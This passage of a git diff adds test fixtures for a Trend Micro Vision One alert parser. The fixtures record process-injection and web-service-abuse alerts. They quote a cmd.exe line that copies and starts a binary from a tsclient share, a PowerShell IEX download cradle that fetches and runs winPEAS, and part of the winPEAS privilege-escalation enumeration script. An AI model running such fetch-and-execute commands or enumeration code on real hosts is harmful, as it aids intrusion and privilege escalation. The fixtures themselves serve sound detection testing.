\"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 83d7e99b5..61b294270 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -20,6 +20,7 @@ "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json new file mode 100644 index 000000000..e3283fe41 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": 